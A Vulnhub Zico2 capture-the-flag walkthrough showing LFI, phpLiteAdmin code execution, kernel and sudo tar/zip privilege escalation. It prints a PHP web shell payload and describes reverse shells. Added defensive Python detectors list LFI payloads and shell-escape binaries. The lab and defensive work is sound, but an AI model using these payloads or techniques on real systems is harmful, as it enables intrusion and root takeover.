Zico2:1 vulnhub walkthrough
Hello friends. Today I will share with you another writeup for a Vulnhub vulnerable machine. The selected target is Zico2. You can download it from the following link: https://download.vulnhub.com/zico/zico2.ova
In this article you will learn the following:
- Using nmap to find open ports & running services.
- Finding PHP file inclusion vulnerabilities.
- Brute-forcing web directories.
- Searching for software public exploits using searchsploit.
- Privilege escalation using kernel exploits.
- Searching for sensitive user data.
- Privilege escalation using zip command.
- Privilege escalation using tar command.
After downloading and importing the OVA file into VirtualBox (it doesn’t work on VMware), you can power it on and start hacking.
The first thing we should do is find the IP address of the target. So, I performed a ping scan of the whole network and found that the IP address of this host is 10.0.2.20.
After that, I performed a full port scan to find all open ports, running services, and the OS version.
I found that this target has only 3 open ports (22 SSH, 80 HTTP, and 111 RPC). I started with the HTTP port by browsing the website hosted on this web server.
I found that the website is an HTML template. Enumerating the home page, I found that it contains a link to a page called “view.php”. This page has a parameter called “page” which takes the name of the page to display.
I started testing this page for a “PHP File Include” vulnerability. I checked for LFI (Local File Include) and succeeded: I can read the contents of the passwd file on Linux as follows:
Testing for RFI (Remote File Include) failed since php.ini is configured not to accept includes from outside the server. So, I had to find a way to upload my PHP shell to the server and call it from this vulnerable page.
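From the defender’s side, the view.php?page=... pattern above is easy to spot in web server logs. The following is an added example, not code from the writeup or from the target machine: it scans constructed Apache combined-log lines and flags include parameters carrying traversal sequences, absolute paths, stream wrappers or remote URLs, null bytes, or a .php file name. The parameter name “page”, the log lines and the addresses are assumptions for illustration.

```python
"""Detect file-inclusion attempts against a page parameter in web server logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters of the application that name a file or page to include
# (assumption: the writeup's view.php uses "page").
INCLUDE_PARAMS = {"page"}

# Value patterns that indicate traversal, absolute paths, wrappers or script includes.
SUSPICIOUS = [
    (re.compile(r"\.\./|\.\.\\"), "directory traversal"),
    (re.compile(r"^/"), "absolute path"),
    (re.compile(r"^[a-z0-9.+-]+://", re.I), "stream wrapper or remote URL"),
    (re.compile(r"\x00"), "null byte"),
    (re.compile(r"\.php$", re.I), "include of a .php file"),
]

# Apache combined log: ip ident user [timestamp] "METHOD URL PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_param(value: str) -> str:
    """Decode twice so double-encoded payloads such as %252e%252e are normalised."""
    return unquote(unquote(value))


def classify_request(url: str):
    """Return (param, decoded value, reason) triples for one request URL."""
    findings = []
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in query.items():
        if name not in INCLUDE_PARAMS:
            continue
        for raw in values:
            value = decode_param(raw)
            for pattern, reason in SUSPICIOUS:
                if pattern.search(value):
                    findings.append((name, value, reason))
    return findings


def scan_log(lines):
    """Return (ip, url, sorted reasons) for every line with a suspicious include parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("url"))
        if findings:
            hits.append((m.group("ip"), m.group("url"), sorted({f[2] for f in findings})))
    return hits


# Constructed sample log lines (not real traffic from the target).
SAMPLE_LOG = [
    '10.0.2.15 - - [01/Jan/2024:10:00:00 +0000] "GET /view.php?page=tools HTTP/1.1" 200 512',
    '10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1843',
    '10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "GET /view.php?page=%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1843',
    '10.0.2.15 - - [01/Jan/2024:10:00:20 +0000] "GET /view.php?page=http://10.0.2.15/shell.txt HTTP/1.1" 500 0',
    '10.0.2.15 - - [01/Jan/2024:10:01:00 +0000] "GET /view.php?page=/usr/databases/hackingresources.php&cmd=id HTTP/1.1" 200 87',
    '10.0.2.15 - - [01/Jan/2024:10:01:10 +0000] "GET /index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {url} -> {', '.join(reasons)}")
```

The double decode matters because a single URL-decode (which the web server and parse_qs already perform) leaves %252e as %2e; the same normalisation is what a hardened view.php should apply before comparing the value against an allowlist of page names.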
Let’s now start brute-forcing the web directories using my favorite tool, “dirbuster” (you can use any other directory brute-forcing tool, such as dirb, etc.).
At the end of the brute-forcing process, I found that the site contains a directory called “dbadmin”.
By browsing this directory, I found that it contains a PHP file which is an admin script for the SQLite database system.
This version of phpLiteAdmin, v1.9.3, is vulnerable to remote code execution.
But I have to log in. By trying “admin” as the password, I logged in to the system.
I followed the exploit instructions:
1- Create a new database (I chose the name “hackingresources.php”).
2- Create a new table with one column.
3- Set the type of the column to “TEXT” and the default value to your shell: “<?php echo system($_GET["cmd"]); ?>”.
You will find that this script is stored in the “/usr/databases/” directory. So, to execute it we can use the previously detected LFI vulnerability as follows:
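What makes this chain work is that the admin tool writes a file with an attacker-chosen name and attacker-chosen content into a directory the vulnerable include can reach. The following is an added example, not code from the writeup or from phpLiteAdmin: it builds a constructed sample directory and audits it the way a defender would check a web-facing database directory, flagging files whose extension is not a database extension, files that are not SQLite at all, and files whose bytes carry a PHP open tag (a real SQLite file can embed one in its schema text, which is exactly the shape produced above). The allowed extensions and the sample files are assumptions.

```python
"""Audit a web-facing database directory for files that an include could execute."""
import os
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"          # header every SQLite 3 file starts with
ALLOWED_EXT = {".db", ".sqlite", ".sqlite3"}   # assumption: what the admin tool should create
PHP_TAGS = (b"<?php", b"<?=")                   # open tags the PHP interpreter honours


def audit_database_dir(path):
    """Return {filename: [reasons]} for every regular file that looks misused."""
    findings = {}
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        reasons = []
        ext = os.path.splitext(name)[1].lower()
        if ext not in ALLOWED_EXT:
            reasons.append(f"unexpected extension {ext or '(none)'}")
        with open(full, "rb") as fh:
            data = fh.read()
        if not data.startswith(SQLITE_MAGIC):
            reasons.append("not a SQLite file")
        if any(tag in data for tag in PHP_TAGS):
            reasons.append("contains PHP open tag")
        if reasons:
            findings[name] = reasons
    return findings


def build_sample_dir():
    """Create a constructed directory with three sample files; returns its path."""
    d = tempfile.mkdtemp(prefix="dbaudit_")
    # legitimate database: header followed by padding
    with open(os.path.join(d, "site.sqlite"), "wb") as fh:
        fh.write(SQLITE_MAGIC + b"\x00" * 100)
    # database named like a script whose schema embeds a PHP tag (constructed marker, not a shell)
    with open(os.path.join(d, "hackingresources.php"), "wb") as fh:
        fh.write(SQLITE_MAGIC + b"\x00" * 20
                 + b"CREATE TABLE t (c TEXT DEFAULT '<?php /* marker */ ?>')")
    # unrelated text left in the directory
    with open(os.path.join(d, "notes.txt"), "wb") as fh:
        fh.write(b"rotate the admin password\n")
    return d


if __name__ == "__main__":
    for name, reasons in audit_database_dir(build_sample_dir()).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The extension check alone would have caught the file created here, but the content check is the one that survives a rename, which is why both are reported separately. The structural fix is to keep the database directory outside anything the include can reach and to restrict view.php to an allowlist of page names.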
I found that Python is installed on the back-end server, so we can use the uploaded shell to run Python and get a reverse shell using “nc”.
After getting the reverse shell, I checked the kernel version of the back-end server. After searching for kernel root exploits, I found that many exist, so I copied one of them to my “Kali Linux” Apache server home directory, then started the Apache service.
After that, I downloaded the exploit to the back-end server using the wget command and stored it in the /tmp directory. Then I compiled it and ran it to get root access (privileges).
Digging more on the back-end server, I found another way to get root 😀
By checking the /etc/passwd file contents, I found that there is a user called “zico” whose home directory is “/home/zico” (note: I did this without root privileges, just as the www-data user). When I listed the contents of zico’s home directory, I found a file called “to_do.txt” and some other directories.
Reading the contents of this file, I found that it contains a hint to explore the other directories. So, I tried joomla and searched for the “configuration.php” file, but it had been deleted. So, I tried wordpress and found that the “wp-config.php” file contains credentials for the MySQL database. The interesting thing is that the username is identical to the username on the Linux box. So, I tried to SSH using these credentials and succeeded.
Then I ran the sudo command to list all the commands the user can run with root privileges. I found that the user can run both the tar and zip commands as root without needing to enter a password.
So, what I’m going to do is escalate privileges from “zico” to “root” in two ways.
The first one uses the zip command, which looks like this:
** I use the --unzip-command option, which is available in the zip command, to run a bash shell while zipping the file.
The other way uses the tar command, which looks like this:
As mentioned in previous writeups, we can escalate privileges using the find command if it has the SUID bit set. So, I used the tar command to set the SUID bit on the find command and then used find to get root.
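Both escalations rest on the same sudoers entry: archive tools that can run arbitrary commands, granted to a user as root without a password. The counterpart on the administration side is to audit sudoers for such rules before an attacker does. The following is an added example, not code from the writeup: it parses constructed sudoers text mirroring the zico entry described above and reports rules that hand out a root shell escape. The list of risky binaries is an assumption drawn from commonly cited shell-escape tools, and the parser handles plain user rules only, not aliases.

```python
"""Audit sudoers rules for root access to binaries that can run other commands."""
import os
import re

# Binaries that can spawn a shell, run a command or write arbitrary files when run as root.
SHELL_ESCAPE_BINARIES = {
    "tar", "zip", "find", "vim", "vi", "less", "more", "awk", "perl",
    "python", "python3", "bash", "sh", "env", "cp", "mv", "chmod", "chown",
}

# user  host = (runas) [TAG: ...] command, command
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$"
)


def parse_sudoers(text):
    """Return (user, runas_user, tags, [commands]) for each user rule in the text."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = set()
        # tags such as "NOPASSWD:" or "SETENV:" precede the command list
        while (tm := re.match(r"^([A-Z]+):\s*", rest)):
            tags.add(tm.group(1))
            rest = rest[tm.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        # "(user:group)" -> user; a missing runas means root
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        rules.append((m.group("user"), runas, tags, commands))
    return rules


def audit_sudoers(text):
    """Return (user, command, note) for rules that grant a root shell escape."""
    findings = []
    for user, runas, tags, commands in parse_sudoers(text):
        if runas not in ("root", "ALL"):
            continue
        for cmd in commands:
            if cmd == "ALL":
                findings.append((user, cmd, "unrestricted root via sudo"))
                continue
            name = os.path.basename(cmd.split()[0])
            if name in SHELL_ESCAPE_BINARIES:
                auth = "NOPASSWD" if "NOPASSWD" in tags else "password required"
                findings.append((user, cmd, f"{name} can escape to a root shell ({auth})"))
    return findings


# Constructed sudoers text (not the target's actual file).
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
zico    ALL=(root) NOPASSWD: /usr/bin/zip, /bin/tar
backup  ALL=(root) /usr/bin/rsync
"""

if __name__ == "__main__":
    for user, cmd, note in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} -> {note}")
```

Run against a real file the tool would be pointed at /etc/sudoers and the drop-ins under /etc/sudoers.d; the rule for zico is the one to remove or replace with a dedicated backup script that takes no arguments, since restricting tar or zip by argument pattern still leaves options such as the --unzip-command shown above available.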
I hope you enjoyed this and learned something new in the pen-testing field. If you have any questions or comments, please write them down in the comments and wait for the next writeup 😀